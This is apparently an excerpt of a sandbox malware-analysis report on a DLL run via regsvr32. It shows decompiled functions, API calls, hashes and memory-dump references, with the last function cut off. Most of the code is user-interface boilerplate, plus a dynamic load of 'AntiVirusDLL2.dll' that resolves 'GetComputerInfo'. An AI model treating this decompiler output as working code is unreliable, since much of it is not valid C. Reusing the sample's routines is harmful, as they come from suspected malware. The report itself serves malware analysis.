                                                                                                                0x10002822
                                                                                                                0x10002828
                                                                                                                0x1000282b
                                                                                                                0x1000282b
                                                                                                                0x100027fa
                                                                                                                0x10002801
                                                                                                                0x1000280a
                                                                                                                0x1000280a

                                                                                                                APIs
                                                                                                                • LoadLibraryA.KERNEL32(dll//AntiVirusDLL2.dll), ref: 100027EE
                                                                                                                • GetProcAddress.KERNEL32(00000000,GetComputerInfo), ref: 10002811
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                                • String ID: GetComputerInfo$dll//AntiVirusDLL2.dll
                                                                                                                • API String ID: 2574300362-350967257
                                                                                                                • Opcode ID: 5c1b4f95d8da9572d4151b00c4a79dde054d989a5c08d6a936d9945051a2455d
                                                                                                                • Instruction ID: 2a93e0a6df5a093b03b8c2167961479cea2b79d08d548067a17943b43938591b
                                                                                                                • Opcode Fuzzy Hash: 5c1b4f95d8da9572d4151b00c4a79dde054d989a5c08d6a936d9945051a2455d
                                                                                                                • Instruction Fuzzy Hash: C82138A97502003BEE14F6B4ACD69BF629AEB94610704482AF756DF2C2DE74FC829711
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1001D024 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 92windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 77%
                                                                                                                			E1001D024(void* __edx, signed int _a116, char _a120) {
				void _v12;
				char _v16;
				signed int _v20;
				int _v24;
				char _v124;
				char _v172;
				intOrPtr _v184;
				int __ebx;
				signed int __edi;
				signed int __esi;
				signed int __ebp;
				signed int _t26;
				unsigned int _t28;
				intOrPtr _t35;
				unsigned int _t39;
				intOrPtr _t40;
				void* _t42;
				void* _t43;
				signed int _t45;

				_t45 =  &_v124;
				_t26 =  *0x1006dbdc; // 0xdf7c0cda
				_a116 = _t26 ^ _t45;
				_push(_t43);
				_push(_t42);
				_t28 = GetMenuCheckMarkDimensions();
				_t38 = _t28;
				_t39 = _t28 >> 0x10;
				_v24 = _t39;
				if(_t28 <= 4 || __ecx <= 5) {
					_push(_t45);
					_push(_t39);
					_v172 = 0x1006c938;
					E1003D2F0( &_v172, 0x1006522c);
					asm("int3");
					_push(4);
					E1003D1E6(E10052A8D, _t38, _t42, _t43);
					_t40 = E1002D12C(0x104);
					_v184 = _t40;
					_t35 = 0;
					_v172 = 0;
					if(_t40 != 0) {
						_t35 = E10022AE3(_t40);
					}
					return E1003D2BE(_t35);
				} else {
					if(__ebx > 0x20) {
						__ebx = 0x20;
					}
					__eax = __ebx - 4;
					asm("cdq");
					__eax = __ebx - 4 - __edx;
					__esi = __ebx + 0xf;
					__esi = __ebx + 0xf >> 4;
					__ebx - 4 - __edx = __ebx - 4 - __edx >> 1;
					__esi = __esi << 4;
					__edi = (__ebx - 4 - __edx >> 1) + (__esi << 4);
					__edi = (__ebx - 4 - __edx >> 1) + (__esi << 4) - __ebx;
					if(__edi > 0xc) {
						__edi = 0xc;
					}
					__eax = 0x20;
					if(__ecx > __eax) {
						_v24 = __eax;
					}
					 &_v12 = E1003BB70(__edi,  &_v12, 0xff, 0x80);
					_v24 = _v24 + 0xfffffffa;
					_v24 + 0xfffffffa >> 1 = (_v24 + 0xfffffffa >> 1) * __esi;
					__ecx = __esi + __esi;
					__eax = __ebp + (_v24 + 0xfffffffa >> 1) * __esi * 2 - 0xc;
					__edx = 0x1005ac1c;
					_v20 = __esi + __esi;
					_v16 = 5;
					do {
						__si =  *__edx & 0x000000ff;
						__ecx = __edi;
						__si = ( *__edx & 0x000000ff) << __cl;
						__edx =  &(__edx[1]);
						__ecx = __si & 0x0000ffff;
						__eax->i = __ch;
						__eax->i = __cl;
						__eax = __eax + _v20;
						_t21 =  &_v16;
						 *_t21 = _v16 - 1;
					} while ( *_t21 != 0);
					__eax =  &_v12;
					__eax = CreateBitmap(__ebx, _v24, 1, 1,  &_v12);
					_pop(__edi);
					_pop(__esi);
					 *0x10070cc0 = __eax;
					_pop(__ebx);
					if(__eax == 0) {
						__eax = LoadBitmapA(__eax, 0x7fe3);
						 *0x10070cc0 = __eax;
					}
					__ecx = _a116;
					__ecx = _a116 ^ __ebp;
					__eax = E1003B437(__eax, __ebx, _a116 ^ __ebp, __edx, __edi, __esi);
					__ebp =  &_a120;
					__esp =  &_a120;
					_pop(__ebp);
					return __eax;
				}
			}






















                                                                                                                0x1001d025
                                                                                                                0x1001d02f
                                                                                                                0x1001d036
                                                                                                                0x1001d03a
                                                                                                                0x1001d03b
                                                                                                                0x1001d03c
                                                                                                                0x1001d042
                                                                                                                0x1001d04b
                                                                                                                0x1001d04e
                                                                                                                0x1001d051
                                                                                                                0x1001729e
                                                                                                                0x100172a1
                                                                                                                0x100172ab
                                                                                                                0x100172b2
                                                                                                                0x100172b7
                                                                                                                0x100172b8
                                                                                                                0x100172bf
                                                                                                                0x100172ce
                                                                                                                0x100172d0
                                                                                                                0x100172d3
                                                                                                                0x100172d7
                                                                                                                0x100172da
                                                                                                                0x100172dc
                                                                                                                0x100172dc
                                                                                                                0x100172e6
                                                                                                                0x1001d05d
                                                                                                                0x1001d060
                                                                                                                0x1001d064
                                                                                                                0x1001d064
                                                                                                                0x1001d065
                                                                                                                0x1001d068
                                                                                                                0x1001d069
                                                                                                                0x1001d06b
                                                                                                                0x1001d06e
                                                                                                                0x1001d073
                                                                                                                0x1001d077
                                                                                                                0x1001d07a
                                                                                                                0x1001d07c
                                                                                                                0x1001d081
                                                                                                                0x1001d085
                                                                                                                0x1001d085
                                                                                                                0x1001d088
                                                                                                                0x1001d08b
                                                                                                                0x1001d08d
                                                                                                                0x1001d08d
                                                                                                                0x1001d09e
                                                                                                                0x1001d0a6
                                                                                                                0x1001d0ae
                                                                                                                0x1001d0b1
                                                                                                                0x1001d0b4
                                                                                                                0x1001d0b8
                                                                                                                0x1001d0bd
                                                                                                                0x1001d0c0
                                                                                                                0x1001d0c7
                                                                                                                0x1001d0c7
                                                                                                                0x1001d0cb
                                                                                                                0x1001d0cd
                                                                                                                0x1001d0d0
                                                                                                                0x1001d0d4
                                                                                                                0x1001d0d7
                                                                                                                0x1001d0d9
                                                                                                                0x1001d0dc
                                                                                                                0x1001d0df
                                                                                                                0x1001d0df
                                                                                                                0x1001d0df
                                                                                                                0x1001d0e4
                                                                                                                0x1001d0f0
                                                                                                                0x1001d0f8
                                                                                                                0x1001d0f9
                                                                                                                0x1001d0fa
                                                                                                                0x1001d0ff
                                                                                                                0x1001d100
                                                                                                                0x1001d108
                                                                                                                0x1001d10e
                                                                                                                0x1001d10e
                                                                                                                0x1001d113
                                                                                                                0x1001d116
                                                                                                                0x1001d118
                                                                                                                0x1001d11d
                                                                                                                0x1001d120
                                                                                                                0x1001d120
                                                                                                                0x1001d121
                                                                                                                0x1001d121

                                                                                                                APIs
                                                                                                                • GetMenuCheckMarkDimensions.USER32 ref: 1001D03C
                                                                                                                • _memset.LIBCMT ref: 1001D09E
                                                                                                                • CreateBitmap.GDI32(?,?,00000001,00000001,?), ref: 1001D0F0
                                                                                                                • LoadBitmapA.USER32 ref: 1001D108
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Bitmap$CheckCreateDimensionsLoadMarkMenu_memset
                                                                                                                • String ID:
                                                                                                                • API String ID: 4271682439-3916222277
                                                                                                                • Opcode ID: 992e82bce5306714c7f7208ed989e3000c036713dc2ec795b1cd969a9b1bd3e8
                                                                                                                • Instruction ID: 9cb990df8155ee4390ab2b3a55e264f6333e16bccc0bff2fcfcad58d756d3a0f
                                                                                                                • Opcode Fuzzy Hash: 992e82bce5306714c7f7208ed989e3000c036713dc2ec795b1cd969a9b1bd3e8
                                                                                                                • Instruction Fuzzy Hash: 4F310572A002599FEB10DF78CC86BAE7BF5EB48304F15062AE901EB281D630E985CB50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1001EC6F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 92comCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 83%
                                                                                                                			E1001EC6F(signed int __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t49;
				signed int _t60;
				signed int _t64;
				signed int _t67;
				signed int _t80;
				signed int _t86;
				intOrPtr* _t90;
				void* _t91;

				_t74 = __ebx;
				_push(0x80);
				E1003D24F(E10053290, __ebx, __edi, __esi);
				_t49 =  *((intOrPtr*)(_t91 + 8));
				_t90 = __ecx;
				 *((intOrPtr*)(_t91 - 0x50)) = 0;
				 *((intOrPtr*)(_t91 - 0x54)) = 0x100572d4;
				 *(_t91 - 4) = 0;
				if(_t49 == 0 ||  *(_t49 + 4) == 0) {
					if(E1001E026(_t91 - 0x54, 0x11) != 0 || E1001E026(_t91 - 0x54, 0xd) != 0) {
						_t49 = _t91 - 0x54;
						goto L6;
					} else {
						 *((intOrPtr*)(_t90 + 0x64)) = 0;
					}
				} else {
					L6:
					_t11 = _t49 + 4; // 0x10004b40
					GetObjectA( *_t11, 0x3c, _t91 - 0x4c);
					_push(_t91 - 0x30);
					 *(_t91 - 0x78) = 0x20;
					E100169AB(_t74, _t91 - 0x58, 0, _t90, __eflags);
					 *((intOrPtr*)(_t91 - 0x74)) =  *((intOrPtr*)(_t91 - 0x58));
					 *((short*)(_t91 - 0x68)) =  *((intOrPtr*)(_t91 - 0x3c));
					 *(_t91 - 0x66) =  *(_t91 - 0x35) & 0x000000ff;
					 *(_t91 - 0x64) =  *(_t91 - 0x38) & 0x000000ff;
					 *(_t91 - 0x60) =  *(_t91 - 0x37) & 0x000000ff;
					 *(_t91 - 0x5c) =  *(_t91 - 0x36) & 0x000000ff;
					_t60 =  *(_t91 - 0x4c);
					__eflags = _t60;
					 *(_t91 - 4) = 1;
					_t74 = _t60;
					if(__eflags < 0) {
						_t74 =  ~_t60;
					}
					E10024650(_t74, _t91 - 0x8c, 0, _t90, __eflags);
					 *(_t91 - 4) = 2;
					_t80 = GetDeviceCaps( *(_t91 - 0x84), 0x5a);
					_t64 = _t74 * 0xafc80;
					asm("cdq");
					_t86 = _t64 % _t80;
					_t90 = _t90 + 0x64;
					 *((intOrPtr*)(_t91 - 0x6c)) = 0;
					 *(_t91 - 0x70) = _t64 / _t80;
					E1002C404(_t90);
					_t67 = _t91 - 0x78;
					__imp__#420(_t67, 0x1005fb14, _t90,  *((intOrPtr*)(_t90 + 0x20)));
					__eflags = _t67;
					if(__eflags < 0) {
						 *_t90 = 0;
					}
					 *(_t91 - 4) = 1;
					E100246A4(_t74, _t91 - 0x8c, 0, _t90, __eflags);
					__eflags =  *((intOrPtr*)(_t91 - 0x58)) + 0xfffffff0;
					E10001020( *((intOrPtr*)(_t91 - 0x58)) + 0xfffffff0, _t86);
				}
				 *(_t91 - 4) =  *(_t91 - 4) | 0xffffffff;
				 *((intOrPtr*)(_t91 - 0x54)) = 0x100572c4;
				E10024848(_t91 - 0x54);
				return E1003D2D2(_t74, 0, _t90);
			}











                                                                                                                0x1001ec6f
                                                                                                                0x1001ec6f
                                                                                                                0x1001ec79
                                                                                                                0x1001ec7e
                                                                                                                0x1001ec83
                                                                                                                0x1001ec85
                                                                                                                0x1001ec88
                                                                                                                0x1001ec91
                                                                                                                0x1001ec94
                                                                                                                0x1001eca7
                                                                                                                0x1001ecbf
                                                                                                                0x00000000
                                                                                                                0x1001ecb7
                                                                                                                0x1001ecb7
                                                                                                                0x1001ecb7
                                                                                                                0x1001ecc2
                                                                                                                0x1001ecc2
                                                                                                                0x1001ecc8
                                                                                                                0x1001eccb
                                                                                                                0x1001ecd4
                                                                                                                0x1001ecd8
                                                                                                                0x1001ecdf
                                                                                                                0x1001ece7
                                                                                                                0x1001ecee
                                                                                                                0x1001ecf7
                                                                                                                0x1001ecff
                                                                                                                0x1001ed06
                                                                                                                0x1001ed0d
                                                                                                                0x1001ed10
                                                                                                                0x1001ed13
                                                                                                                0x1001ed15
                                                                                                                0x1001ed19
                                                                                                                0x1001ed1b
                                                                                                                0x1001ed1f
                                                                                                                0x1001ed1f
                                                                                                                0x1001ed2a
                                                                                                                0x1001ed37
                                                                                                                0x1001ed41
                                                                                                                0x1001ed45
                                                                                                                0x1001ed4b
                                                                                                                0x1001ed4c
                                                                                                                0x1001ed4e
                                                                                                                0x1001ed52
                                                                                                                0x1001ed55
                                                                                                                0x1001ed58
                                                                                                                0x1001ed63
                                                                                                                0x1001ed67
                                                                                                                0x1001ed6d
                                                                                                                0x1001ed6f
                                                                                                                0x1001ed71
                                                                                                                0x1001ed71
                                                                                                                0x1001ed79
                                                                                                                0x1001ed7d
                                                                                                                0x1001ed85
                                                                                                                0x1001ed88
                                                                                                                0x1001ed88
                                                                                                                0x1001ed8d
                                                                                                                0x1001ed94
                                                                                                                0x1001ed9b
                                                                                                                0x1001eda5

                                                                                                                APIs
                                                                                                                • __EH_prolog3_GS.LIBCMT ref: 1001EC79
                                                                                                                • GetObjectA.GDI32(10004B40,0000003C,?), ref: 1001ECCB
                                                                                                                • GetDeviceCaps.GDI32(?,0000005A), ref: 1001ED3B
                                                                                                                • OleCreateFontIndirect.OLEAUT32(00000020,1005FB14), ref: 1001ED67
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CapsCreateDeviceFontH_prolog3_IndirectObject
                                                                                                                • String ID:
                                                                                                                • API String ID: 2429671754-3916222277
                                                                                                                • Opcode ID: fd6a83b91025a1e243d81439bf92102b6f9ea5486c0032e63b3cc1f7a9fd35ba
                                                                                                                • Instruction ID: 2ac9b723a89d01decfb637a09a62b78833065597251375f61e3161f746e419ea
                                                                                                                • Opcode Fuzzy Hash: fd6a83b91025a1e243d81439bf92102b6f9ea5486c0032e63b3cc1f7a9fd35ba
                                                                                                                • Instruction Fuzzy Hash: F1418938D012899EDB10DFE4D945ADCBBF4EF18340F10805AE856AB292EBB49A85CB11
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1000BBD0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 76sleepCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 55%
                                                                                                                			E1000BBD0(void* __ebx, void* __ecx, void* __ebp) {
				short _v8;
				char _v12;
				char _v16;
				char _v32;
				char _v40;
				char _v52;
				char _v60;
				char _v68;
				char _v72;
				char _v80;
				char _v92;
				char _v100;
				char _v104;
				void* __edi;
				void* __esi;
				signed int _t23;
				void* _t26;
				void* _t64;
				intOrPtr* _t66;
				void* _t68;

				_push(0xffffffff);
				_push(E10051888);
				_push( *[fs:0x0]);
				_t23 =  *0x1006dbdc; // 0xdf7c0cda
				_push(_t23 ^ _t68 - 0x00000038);
				 *[fs:0x0] =  &_v12;
				_t64 = __ecx;
				_t26 = E10018B24(__ecx, 0x10058060, 0x10058070, 0x34);
				if(_t26 == 6) {
					_v60 = 0;
					E1002A52A(__ebx,  &_v60, 0, __ecx, 0);
					_v8 = 0;
					E1002A12B( &_v32);
					_v12 = 1;
					E1002A12B( &_v52);
					_v16 = 2;
					E100011D0( &_v80,  &_v72,  &_v40);
					E1001614A( &_v92);
					E10001270( &_v92,  &_v68);
					E1001614A( &_v100);
					Sleep(0x514);
					E10001360(_t64 + 0x298, "Ozzar");
					E10019B72(__ebx, _t64, _t64 + 0x2a0, 0);
					_t66 = __imp__#9;
					 *_t66( &_v80, 0x10058314);
					 *_t66( &_v68);
					_t26 =  *_t66( &_v104);
				}
				 *[fs:0x0] = _v12;
				return _t26;
			}























                                                                                                                0x1000bbd0
                                                                                                                0x1000bbd2
                                                                                                                0x1000bbdd
                                                                                                                0x1000bbe3
                                                                                                                0x1000bbea
                                                                                                                0x1000bbef
                                                                                                                0x1000bbf5
                                                                                                                0x1000bc03
                                                                                                                0x1000bc0b
                                                                                                                0x1000bc1c
                                                                                                                0x1000bc21
                                                                                                                0x1000bc2b
                                                                                                                0x1000bc2f
                                                                                                                0x1000bc39
                                                                                                                0x1000bc3e
                                                                                                                0x1000bc5a
                                                                                                                0x1000bc5f
                                                                                                                0x1000bc68
                                                                                                                0x1000bc79
                                                                                                                0x1000bc82
                                                                                                                0x1000bc8c
                                                                                                                0x1000bc9d
                                                                                                                0x1000bca4
                                                                                                                0x1000bca9
                                                                                                                0x1000bcb4
                                                                                                                0x1000bcbb
                                                                                                                0x1000bcc2
                                                                                                                0x1000bcc2
                                                                                                                0x1000bcc8
                                                                                                                0x1000bcd5

                                                                                                                APIs
                                                                                                                  • Part of subcall function 1002A52A: __EH_prolog3.LIBCMT ref: 1002A534
                                                                                                                  • Part of subcall function 1002A52A: VariantClear.OLEAUT32 ref: 1002A53C
                                                                                                                  • Part of subcall function 1002A12B: _memset.LIBCMT ref: 1002A133
                                                                                                                • Sleep.KERNEL32(00000514,10058070,10058060,?), ref: 1000BC8C
                                                                                                                • VariantClear.OLEAUT32(?), ref: 1000BCB4
                                                                                                                • VariantClear.OLEAUT32(?), ref: 1000BCBB
                                                                                                                • VariantClear.OLEAUT32(10058070), ref: 1000BCC2
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ClearVariant$H_prolog3Sleep_memset
                                                                                                                • String ID: Ozzar
                                                                                                                • API String ID: 3417858741-2206785293
                                                                                                                • Opcode ID: 7159e6c18851930088be3620f45020f257766a4bb415863c32cdff60577850bd
                                                                                                                • Instruction ID: 9694449ef2e57fff831d88a67ed3a40869d929435a6cd09dc07e0504fd4c6e23
                                                                                                                • Opcode Fuzzy Hash: 7159e6c18851930088be3620f45020f257766a4bb415863c32cdff60577850bd
                                                                                                                • Instruction Fuzzy Hash: 89217F76408240ABD304DB64DC81E9FB7E9EFD9B50F400A1DF64693291EB70F608CBA2
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1001764E Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 64COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 58%
                                                                                                                			E1001764E(void* __edi, intOrPtr _a4, intOrPtr* _a8) {
				void _v20;
				int _t14;
				int _t18;
				intOrPtr* _t23;
				void* _t25;

				if(E100174A2() == 0) {
					if(_a4 != 0x12340042) {
						L9:
						_t14 = 0;
						L10:
						return _t14;
					}
					_t23 = _a8;
					if(_t23 == 0 ||  *_t23 < 0x28 || SystemParametersInfoA(0x30, 0,  &_v20, 0) == 0) {
						goto L9;
					} else {
						 *((intOrPtr*)(_t23 + 4)) = 0;
						 *((intOrPtr*)(_t23 + 8)) = 0;
						 *((intOrPtr*)(_t23 + 0xc)) = GetSystemMetrics(0);
						_t18 = GetSystemMetrics(1);
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						 *(_t23 + 0x10) = _t18;
						 *((intOrPtr*)(_t23 + 0x24)) = 1;
						if( *_t23 >= 0x48) {
							E1003D4C2(_t25, _t23 + 0x28, 0x20, "DISPLAY", 0x1f);
						}
						_t14 = 1;
						goto L10;
					}
				}
				return  *0x10070958(_a4, _a8);
			}








                                                                                                                0x1001765b
                                                                                                                0x10017674
                                                                                                                0x100176df
                                                                                                                0x100176df
                                                                                                                0x100176e1
                                                                                                                0x00000000
                                                                                                                0x100176e2
                                                                                                                0x10017676
                                                                                                                0x1001767d
                                                                                                                0x00000000
                                                                                                                0x10017696
                                                                                                                0x10017697
                                                                                                                0x1001769a
                                                                                                                0x100176a8
                                                                                                                0x100176ab
                                                                                                                0x100176b3
                                                                                                                0x100176b4
                                                                                                                0x100176b5
                                                                                                                0x100176b6
                                                                                                                0x100176bd
                                                                                                                0x100176c0
                                                                                                                0x100176c4
                                                                                                                0x100176d3
                                                                                                                0x100176d8
                                                                                                                0x100176db
                                                                                                                0x00000000
                                                                                                                0x100176db
                                                                                                                0x1001767d
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                • SystemParametersInfoA.USER32(00000030,00000000,00000000,00000000), ref: 1001768C
                                                                                                                • GetSystemMetrics.USER32 ref: 100176A4
                                                                                                                • GetSystemMetrics.USER32 ref: 100176AB
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: System$Metrics$InfoParameters
                                                                                                                • String ID: B$DISPLAY
                                                                                                                • API String ID: 3136151823-3316187204
                                                                                                                • Opcode ID: a281f1a2a76fb861f7022dffc9981ca34a3327ed434053b80bbe1aca0a8fef2a
                                                                                                                • Instruction ID: 6fcbc85e4d8e5bbfcc73a28f88d89189f4e8f22adf0df611ee1fa90d055e708e
                                                                                                                • Opcode Fuzzy Hash: a281f1a2a76fb861f7022dffc9981ca34a3327ed434053b80bbe1aca0a8fef2a
                                                                                                                • Instruction Fuzzy Hash: DD119471600624ABDB11DF68DC8499B7BB8FF05790F004451FD49AE145D671D990CBA0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10020DE6 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 57COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E10020DE6(void* __ebx, void* __ecx, void* __edx, void* __eflags, struct HWND__** _a4) {
				void* __edi;
				struct HWND__* _t10;
				struct HWND__* _t12;
				struct HWND__* _t14;
				struct HWND__* _t15;
				int _t19;
				void* _t21;
				void* _t25;
				struct HWND__** _t26;
				void* _t27;

				_t25 = __edx;
				_t21 = __ebx;
				_t26 = _a4;
				_t27 = __ecx;
				if(E10017E39(__ecx, __eflags, _t26) == 0) {
					_t10 = E1001A547(__ecx);
					__eflags = _t10;
					if(_t10 == 0) {
						L5:
						__eflags = _t26[1] - 0x100;
						if(_t26[1] != 0x100) {
							L13:
							return E1001839A(_t26);
						}
						_t12 = _t26[2];
						__eflags = _t12 - 0x1b;
						if(_t12 == 0x1b) {
							L8:
							__eflags = GetWindowLongA( *_t26, 0xfffffff0) & 0x00000004;
							if(__eflags == 0) {
								goto L13;
							}
							_t14 = E1002D8E6(_t21, _t25, _t26, __eflags,  *_t26, "Edit");
							__eflags = _t14;
							if(_t14 == 0) {
								goto L13;
							}
							_t15 = GetDlgItem( *(_t27 + 0x20), 2);
							__eflags = _t15;
							if(_t15 == 0) {
								L12:
								SendMessageA( *(_t27 + 0x20), 0x111, 2, 0);
								goto L1;
							}
							_t19 = IsWindowEnabled(_t15);
							__eflags = _t19;
							if(_t19 == 0) {
								goto L13;
							}
							goto L12;
						}
						__eflags = _t12 - 3;
						if(_t12 != 3) {
							goto L13;
						}
						goto L8;
					}
					__eflags =  *(_t10 + 0x68);
					if( *(_t10 + 0x68) == 0) {
						goto L5;
					}
					return 0;
				}
				L1:
				return 1;
			}













                                                                                                                0x10020de6
                                                                                                                0x10020de6
                                                                                                                0x10020de8
                                                                                                                0x10020ded
                                                                                                                0x10020df6
                                                                                                                0x10020dff
                                                                                                                0x10020e04
                                                                                                                0x10020e06
                                                                                                                0x10020e12
                                                                                                                0x10020e12
                                                                                                                0x10020e19
                                                                                                                0x10020e74
                                                                                                                0x00000000
                                                                                                                0x10020e77
                                                                                                                0x10020e1b
                                                                                                                0x10020e1e
                                                                                                                0x10020e21
                                                                                                                0x10020e28
                                                                                                                0x10020e32
                                                                                                                0x10020e34
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10020e3d
                                                                                                                0x10020e42
                                                                                                                0x10020e44
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10020e4b
                                                                                                                0x10020e51
                                                                                                                0x10020e53
                                                                                                                0x10020e60
                                                                                                                0x10020e6c
                                                                                                                0x00000000
                                                                                                                0x10020e6c
                                                                                                                0x10020e56
                                                                                                                0x10020e5c
                                                                                                                0x10020e5e
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10020e5e
                                                                                                                0x10020e23
                                                                                                                0x10020e26
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10020e26
                                                                                                                0x10020e08
                                                                                                                0x10020e0c
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10020e0e
                                                                                                                0x10020df8
                                                                                                                0x00000000

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: Edit
                                                                                                                • API String ID: 0-554135844
                                                                                                                • Opcode ID: 7bb1b066d883c2fbdd10517dc8fcad8b20b68afe56aeac0873b27eff604e75e7
                                                                                                                • Instruction ID: 06f3a3bee65783aba18e869f62ac87e4262ed707e221f70f68d5299a2e5d6882
                                                                                                                • Opcode Fuzzy Hash: 7bb1b066d883c2fbdd10517dc8fcad8b20b68afe56aeac0873b27eff604e75e7
                                                                                                                • Instruction Fuzzy Hash: 34018E34640302ABEE50D721AC09B5AB6EAEF08790F920E28F416D20B3DB70ECD0C920
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1000B240 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 40processsynchronizationCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E1000B240(void* __ecx, void* __edi, void* __eflags) {
				struct _STARTUPINFOA _v68;
				struct _PROCESS_INFORMATION _v84;
				void* _t17;

				_t17 = __ecx;
